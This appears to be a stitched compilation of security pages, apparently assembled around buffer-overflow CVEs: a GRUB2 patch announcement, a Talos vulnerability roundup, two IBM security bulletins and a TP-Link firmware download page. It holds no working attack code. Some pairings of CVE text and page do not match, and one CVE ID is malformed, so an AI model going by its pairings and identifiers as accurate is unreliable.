\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*

CVE-2022-28737: shim: Buffer overflow when loading crafted EFI images
6.5/CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H

There's a possible overflow in handle\_image() when shim tries to load and execute
crafted EFI executables. The handle\_image() function takes into account the SizeOfRawData
field from each section to be loaded. An attacker can leverage this to perform
out-of-bound writes into memory. Arbitrary code execution is not discarded in
such scenario.

Reported-by: Chris Coulson

\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*

grub-core/commands/boot.c          |  66 +++++++++++++++++++++++++++++++++++++++++++++++-------
grub-core/fs/btrfs.c               | 105 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
grub-core/fs/f2fs.c                |  58 ++++++++++++++++++++++++++++++++++++-----------
grub-core/kern/efi/sb.c            |  39 +++++++++++++++++++++++++++++---
grub-core/kern/file.c              |   2 ++
grub-core/loader/efi/chainloader.c |  46 ++++++++++++++++++++------------------
grub-core/net/dns.c                |  25 ++++++++++++++++-----
grub-core/net/http.c               |  17 +++++++++-----
grub-core/net/ip.c                 |  10 ++++++++-
grub-core/net/net.c                |  11 +++++++--
grub-core/net/netbuff.c            |  13 +++++++++++
grub-core/net/tftp.c               |   3 ++-
grub-core/normal/charset.c         |   2 ++
grub-core/video/readers/jpeg.c     | 106 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++----------------
grub-core/video/readers/png.c      | 158 +++++++++++++++++++++++++++++++++++++++++++++++++++++++++------------------------------------------------------------------------
include/grub/loader.h              |   5 +++++
include/grub/net.h                 |   1 +
include/grub/verify.h              |   1 +
18 files changed, 501 insertions(+), 167 deletions(-)

Chris Coulson (3):
     loader/efi/chainloader: Simplify the loader state
     commands/boot: Add API to pass context to loader
     loader/efi/chainloader: Use grub\_loader\_set\_ex()

Daniel Axtens (20):
     kern/file: Do not leak device\_name on error in grub\_file\_open()
     video/readers/png: Abort sooner if a read operation fails
     video/readers/png: Refuse to handle multiple image headers
     video/readers/png: Drop greyscale support to fix heap out-of-bounds write
     video/readers/png: Avoid heap OOB R/W inserting huff table items
     video/readers/png: Sanity check some huffman codes
     video/readers/jpeg: Abort sooner if a read operation fails
     video/readers/jpeg: Do not reallocate a given huff table
     video/readers/jpeg: Refuse to handle multiple start of streams
     video/readers/jpeg: Block int underflow -> wild pointer write
     normal/charset: Fix array out-of-bounds formatting unicode for display
     net/ip: Do IP fragment maths safely
     net/netbuff: Block overly large netbuff allocs
     net/dns: Fix double-free addresses on corrupt DNS response
     net/dns: Don't read past the end of the string we're checking against
     net/tftp: Prevent a UAF and double-free from a failed seek
     net/tftp: Avoid a trivial UAF
     net/http: Do not tear down socket if it's already been torn down
     net/http: Fix OOB write for split http headers
     net/http: Error out on headers with LF without CR

Darren Kenny (3):
     fs/btrfs: Fix several fuzz issues with invalid dir item sizing
     fs/btrfs: Fix more ASAN and SEGV issues found with fuzzing
     fs/btrfs: Fix more fuzz issues related to chunks

Julian Andres Klode (1):
     kern/efi/sb: Reject non-kernel files in the shim\_lock verifier

Sudhakar Kuppusamy (3):
     fs/f2fs: Do not read past the end of nat journal entries
     fs/f2fs: Do not read past the end of nat bitmap
     fs/f2fs: Do not copy file names that are too long

**Download attachment "**signature.asc**" of type "**application/pgp-signature**" (269 bytes)**

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.

CVE-2022-28733: oss-security - [SECURITY PATCH 00/30] Multiple GRUB2 vulnerabilities

In all, Talos released 22 security advisories regarding Milesight products this month, nine of which have a CVSS score greater than 8, associated with 69 CVEs.

Wednesday, July 19, 2023 11:07

Since the beginning of July, Cisco Talos has published 40 vulnerability advisories affecting a range of software and hardware, including the Microsoft Edge browser.

In our new series called “Vulnerability Roundup,” we’ll be recapping the vulnerabilities we recently disclosed to provide readers with an overview of what the issue is, how they can remediate and what the potential implications are for users. Our latest Vulnerability Advisories are always posted on Talos Intelligence’s website.

**Microsoft Edge memory corruption (TALOS-2023-1747/CVE-2023-36887)**

A memory corruption vulnerability exists in the JavaScript implementation of the Adobe Acrobat PDF engine that the Microsoft Edge web browser uses. Talos tested and confirmed that Edge, versions 112.0.1722.58 and 114.0.1776.0 Canary, are affected by this vulnerability.

An attacker could trigger this vulnerability by tricking a user into opening a specially crafted PDF in the browser. This could trigger a type confusion vulnerability, which could allow the adversary to write to arbitrary memory. Microsoft patched this issue on July 13.

The following Snort rules will detect exploitation attempts of this vulnerability: 61874 and 61875. Additional rules may be released in the future and current rules are subject to change, pending additional vulnerability information. For the most current rule information, please refer to your Cisco Secure Firewall or Snort.org.

**Multiple vulnerabilities in Milesight UR32L router and MilesightVPN**

Talos disclosed multiple vulnerabilities in these products despite no official fix from Milesight, in adherence to Cisco’s vulnerability disclosure policy. Milesight did not respond appropriately during the 90-day period as outlined in the policy.

We have a complete technical breakdown of how an attacker could string some of these vulnerabilities together to completely compromise the UR32L router and MilesightVPN.

In all, Talos released 22 security advisories regarding Milesight products this month, nine of which have a CVSS score greater than 8, associated with 69 CVEs.

**Heap buffer overflow vulnerabilities in Diagon text translator**

Our researchers discovered two vulnerabilities in the Diagon text interpreter that could cause heap-based buffer overflow conditions. Diagon translates Markdown into several formats, including latex, planar graph and tables.

The Diagon interpreter translates a Markdown text sequence diagram to a graphical sequence diagram.

An adversary could exploit TALOS-2023-1745 (CVE-2023-31194) by sending a specially crafted network request to the targeted device, thereby causing a write access violation. TALOS-2023-1744 (CVE-2023-27390) could be exploited the same way, but in this case, leads directly to the heap-based buffer overflow. Diagon’s maintainer released an update to address these vulnerabilities.

Memory corruption vulnerability in Microsoft Edge; MilesightVPN and router could be taken over


All versions of GE Digital CIMPLICITY that are not adhering to SDG guidance and accepting documents from untrusted sources are vulnerable to memory corruption issues due to insufficient input validation, including issues such as out-of-bounds reads and writes, use-after-free, stack-based buffer overflows, uninitialized pointers, and a heap-based buffer overflow. Successful exploitation could allow an attacker to execute arbitrary code.



CVE-2023-3463


IBM Security Guardium 11.3 could allow an authenticated user to cause a denial of service due to improper input validation. IBM X-Force ID: 240903.



**Security Bulletin**

  

**Summary**

IBM Security Guardium has addressed the following vulnerabilities.

**Vulnerability Details**

**CVEID:**   CVE-2022-24903  
**DESCRIPTION:**   rsyslog is vulnerable to a heap-based buffer overflow, caused by improper bounds checking by the TCP syslog server (receiver) components. By sending a specially-crafted request, a remote attacker could overflow a buffer and execute arbitrary code on the system.  
CVSS Base score: 8.1  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/225843 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)

**CVEID:**   CVE-2022-43908  
**DESCRIPTION:**   IBM Security Guardium could allow an authenticated user to cause a denial of service due to improper input validation.  
CVSS Base score: 4.3  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/240903 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L)

**CVEID:**   CVE-2020-12321  
**DESCRIPTION:**   Intel Wireless Bluetooth could allow a remote attacker to gain elevated privileges on the system, caused by improper buffer restriction. By sending a specially crafted-request, an attacker could exploit this vulnerability to gain elevated privileges.  
CVSS Base score: 9.6  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/191496 for the current score.  
CVSS Vector: (CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)

**CVEID:**   CVE-2023-0286  
**DESCRIPTION:**   OpenSSL is vulnerable to a denial of service, caused by a type confusion error related to X.400 address processing inside an X.509 GeneralName. By passing arbitrary pointers to a memcmp call, a remote attacker could exploit this vulnerability to read memory contents or cause a denial of service.  
CVSS Base score: 8.2  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/246611 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H)

**CVEID:**   CVE-2022-1271  
**DESCRIPTION:**   GNU gzip could allow a remote authenticated attacker to bypass security restrictions, caused by improper validation of file name by the zgrep utility. By using a specially-crafted file name, an attacker could exploit this vulnerability to write arbitrary files or execute arbitrary code on the system.  
CVSS Base score: 8.8  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/223754 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)

**CVEID:**   CVE-2022-439210  
**DESCRIPTION:**   IBM Security Guardium could allow a local user to escalate their privileges due to improper permission controls.  
CVSS Base score: 8.4  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/240908 for the current score.  
CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

**CVEID:**   CVE-2022-4378  
**DESCRIPTION:**   Linux Kernel is vulnerable to a denial of service, caused by a stack-based buffer overflow in the \_\_do\_proc\_dointvec function. By executing a specially-crafted program, a local authenticated attacker could exploit this vulnerability to cause a denial of service condition.  
CVSS Base score: 5.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/242006 for the current score.  
CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)

**CVEID:**   CVE-2022-37434  
**DESCRIPTION:**   zlib is vulnerable to a heap-based buffer overflow, caused by improper bounds checking by inflate in inflate.c. By using a large gzip header extra field, a remote attacker could overflow a buffer and execute arbitrary code on the system.  
CVSS Base score: 7.3  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/232849 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)

**Affected Products and Versions**

**Affected Product(s)**

**Version(s)**

IBM Security Guardium

11.3

**Remediation/Fixes**

**Workarounds and Mitigations**

None

**References**

Off

**Acknowledgement**

John Zuccato, Rodney Ryan, Chris Shepherd, Nathan Roane, Vince Dragnea, Troy Fisher, Gabor Minyo, Geoffrey Owden, and Ben Goodspeed from the IBM Security Ethical Hacking Team., John Zuccato, Rodney Ryan, Chris Shepherd, Nathan Roane, Vince Dragnea, T

**Change History**

28 Jun 2023: Initial Publication

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES ""AS IS"" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. "Affected Products and Versions" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.

**Document Location**

Worldwide

\[{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSMPHH","label":"IBM Security Guardium"},"Component":"","Platform":\[{"code":"PF016","label":"Linux"}\],"Version":"11.3","Edition":"","Line of Business":{"code":"LOB24","label":"Security Software"}}\]

CVE-2022-43908: Security Bulletin: IBM Security Guardium is affected by several vulnerabilities

IBM Planning Analytics Cartridge for Cloud Pak for Data 4.0 connects to a CouchDB server. An attacker can exploit an insecure password policy to the CouchDB server and collect sensitive information from the database.  IBM X-Force ID:  247905.

**Security Bulletin**

  

**Summary**

IBM Planning Analytics Cartridge for IBM Cloud Pak for Data is vulnerable to security vulnerabilities . These have been addressed.

**Vulnerability Details**

**CVEID:**   CVE-2022-0185  
**DESCRIPTION:**   Linux Kernel is vulnerable to a heap-based buffer overflow, caused by an integer underflow in the legacy\_parse\_param function in fs/fs\_context.c. By sending a specially-crafted request, a local authenticated attacker could overflow a buffer and execute arbitrary code on the system with root privileges.  
CVSS Base score: 7.8  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/217455 for the current score.  
CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)

**CVEID:**   CVE-2023-27877  
**DESCRIPTION:**   IBM Planning Analytics on Cloud Pak for Data could allow an attacker to obtain sensitive information, due to insecure network policy configuration.  
CVSS Base score: 3.1  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/249981 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N)

**CVEID:**   CVE-2023-26023  
**DESCRIPTION:**   IBM Planning Analytics on Cloud Pak for Data exposes sensitive information in logs which could lead an attacker to exploit this vulnerability to conduct further attacks.  
CVSS Base score: 6.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/247896 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)

**CVEID:**   CVE-2023-26026  
**DESCRIPTION:**   IBM Planning Analytics connects to a CouchDB server. An attacker can exploit an insecure password policy to the CouchDB server and collect sensitive information from the database.  
CVSS Base score: 5.3  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/247905 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)

**Affected Products and Versions**

Affected Product(s)

Version(s)

IBM Planning Analytics Cartridge for IBM Cloud Pak for Data

4.0

**Remediation/Fixes**

**Workarounds and Mitigations**

None

**References**

Off

**Acknowledgement**

**Change History**

29 Jun 2023: Initial Publication

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES ""AS IS"" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. "Affected Products and Versions" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.

**Document Location**

Worldwide

\[{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSDVGH","label":"IBM Planning Analytics Cartridge for IBM Cloud Pak for Data"},"Component":"","Platform":\[{"code":"PF025","label":"Platform Independent"}\],"Version":"4.0","Edition":"","Line of Business":{"code":"LOB10","label":"Data and AI"}},{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSCTEW","label":"IBM Planning Analytics Local"},"Component":"","Platform":\[{"code":"PF025","label":"Platform Independent"}\],"Version":"2.0","Edition":"All","Line of Business":{"code":"LOB10","label":"Data and AI"}}\]

CVE-2023-27877: Security Bulletin: IBM Planning Analytics Cartridge for IBM Cloud Pak for Data 4.7.0 has addressed security vulnerabilities

TP-LINK Archer C50v2 Archer C50(US)_V2_160801, TP-LINK Archer C20v1 Archer_C20_V1_150707, and TP-LINK Archer C2v1 Archer_C2_US__V1_170228 were discovered to contain a buffer overflow which may lead to a Denial of Service (DoS) when parsing crafted data.

**Utility**

USB\_Printer\_Controller\_Utility\_Mac

Download

Published Date: 2022-02-21

Language: English

File Size: 1.75 MB

Operating System: Mac OS 10.15/11.x/12.x

USB\_Printer\_Controller\_Utility\_Mac

Download

Published Date: 2018-10-29

Language: English

File Size: 2.53 MB

Operating System: Mac OS 10.9-10.14

USB\_Printer\_Controller\_Utility\_Windows

Download

Published Date: 2016-11-18

Language: English

File Size: 9.62 MB

Operating System: WinXP/Vista/7/8/8.1/10

Archer C2\_V1\_Easy Setup Assistant\_140218

Download

Published Date: 2014-02-18

Language: English

File Size: 6.78 MB

Operating System: WinXP/Vista/7/8

**Setup Video**

*   **How to Resolve Double NAT using Starlink**
*   **How to Configure a TP-Link Router with Starlink**
*   **How to Set up Address Reservation on TP-Link Routers Windows**
    
    This video will show you how to set up Address Reservation on TP-Link routers.
    
    More Fold
    
*   **How to Set up OpenVPN on TP-Link Routers Windows**
    
    This video will show you how to set up OpenVPN on a TP-Link Wi-Fi router. For more information, visit www.tp-link.com/support.
    
    More Fold
    
*   **What should I do if I cannot access the internet? - Using a DSL modem and a TP-Link router**
    
    If you can’t access the internet using a DSL modem and TP-Link router, this video can help you solve the problem.
    
    More Fold
    
*   **What should I do if I cannot access the internet? - Using a cable modem and a TP-Link router**
    
    If you can’t access the internet using a cable modem and TP-Link router, follow this video step by step to solve your problem.
    
    More Fold
    
*   **How to turn a router into an Access Point?**
*   **How to set up Port Forwarding on a TP-Link router**
    
    Take Archer A7 as demonstration.
    
    More Fold
    
*   **How to set Parental Controls on a TP-Link router**
    
    Take Archer A9 as demonstration.
    
    More Fold
    
*   **How to change the Wi-Fi settings on TP-Link router**

**Firmware**

A firmware update can resolve issues that the previous firmware version may have and improve its current performance.

**To Upgrade**

**IMPORTANT:** To prevent upgrade failures, please read the following before proceeding with the upgrade process

*   **Please upgrade firmware from the local TP-Link official website of the purchase location for your TP-Link device, otherwise it will be against the warranty. Please click here to change site if necessary.**
*   Please verify the hardware version of your device for the firmware version. Wrong firmware upgrade may damage your device and void the warranty. (**Normally Vx.0=Vx.6/Vx.8 (eg:V1.0=V1.6/V1.8);   Vx.x0=Vx.x6/Vx.x8 (eg:V1.20=V1.26/V1.28)**  
    How to find the hardware version on a TP-Link device
*   **Do NOT turn off the power during the upgrade process, as it may cause permanent damage to the product.**
*   To avoid wireless disconnect issue during firmware upgrade process, it's recommended to upload firmware with wired connection unless there is no LAN/Ethernet port on your TP-Link device.
*   It's recommended that users stop all Internet applications on the computer, or simply disconnect Internet line from the device before the upgrade.
*   Use decompression software such as WinZIP or WinRAR to extract the file you download before the upgrade.

More Fold

Archer C2(US)\_V1\_170228

Download

Published Date: 2017-02-28

Language: English

File Size: 6.69 MB

Modifications and Bug Fixes:

New Features/Enhancement:  
Optimized the security mechanism.

Bug fixed:  
1\. Fixed the bug that some IPv6 websites can't be accessed in some special scenarios.  
2\. Fixed the bug that the device would be unable to access internet when special IP address and gateway are offered by ISP.

Notes:

1\. For Archer C2(US)\_V1.  
2\. It is NOT suggested to upgrade firmware which is not for your region. If this site is not for your region, please click here to choose your own region and download the most suitable firmware version.

Archer C2(US)\_V1\_160606

Download

Published Date: 2016-06-06

Language: English

File Size: 6.53 MB

Modifications and Bug Fixes:

New Features/Enhancement：  
1\. Added the function to filter the https website.  
2\. Improved the 2.4GHz wireless capability.  
3\. Enhanced the security mechanism.  
4\. Optimized the performance of IPv6 connection.

Bug Fixed：  
1\. Fixed the bug that the the delay is higher than normal when trying to Ping the LAN IP of the device.  
2\. Fixed the bug that the media server would display but fail to use the sharing files even you've already deleted the last folder.  
3\. Fixed the bug that some repeaters may fail to renew IP address normally with it.  
4\. Fixed the bug that PPPoE connection may fail to be connected in some special scenario.

Notes:

1\. For Archer C2(US)\_V1  
2\.  It is NOT suggested to upgrade firmware which is not for your region. If this site is not for your region, please click here to choose your own region and download the most suitable firmware version.

Archer C2(US)\_v1\_160128

Download

Published Date: 2016-01-28

Language: English

File Size: 6.57 MB

Modifications and Bug Fixes:

New Features/Enhancement：  
1\. Added the conflict detection function of DNS and LAN IP.  
2\. Enhance the performance for multicast.   
3\. The switch of DOS won't affect the Ping function of WAN and LAN any more.  
Bug Fixed：  
The LED light would keep flashing if the USB device is unplugged when scanning.

Notes:

1.For Archer C2(US)1.0  
2.If you’re in a region out of United States, please do not upgrade US firmware.Click here to choose your region for the most suitable firmware.

**To Use Third Party Firmware In TP-Link Products**

Some official firmware of TP-Link products can be replaced by the third party firmware such as DD-WRT. TP-Link is not obligated to provide any maintenance or support for it, and does not guarantee the performance and stability of third party firmware. Damage to the product as a result of using third party firmware will void the product's warranty.

**Open Source Code For Programmers (GPL)**

Please note: The products of TP-Link partly contain software code developed by third parties, including software code subject to the GNU General Public Licence (“GPL“), Version 1/Version 2/Version 3 or GNU Lesser General Public License ("LGPL"). You may use the respective software condition to following the GPL licence terms.

You can review, print and download the respective GPL licence terms here. You receive the GPL source codes of the respective software used in TP-Link products for direct download and further information, including a list of TP-Link software that contain GPL software code under GPL Code Center.

The respective programs are distributed WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the respective GNU General Public License for more details.

**Apps**

TP-Link Tether

TP-Link Tether provides the easiest way to access and manage your network with your iOS or Android devices. Learn more about TP-Link Tether and Compatible Devices

Note: To use Tether, please update your TP-Link device's firmware to the latest version.

**Emulators**

Firmware Version

Working Mode

Language

140218

\-

English

Browse

**Note:**

1\.  The emulator is a virtual web GUI where you can experience the TP-Link product management panel.

2\. The listed emulators might not have the latest firmware.

3\.  The features displayed are for reference, and their availability may depend on local regulations. For more information, please refer to the datasheet or product page.

Tag

#buffer_overflow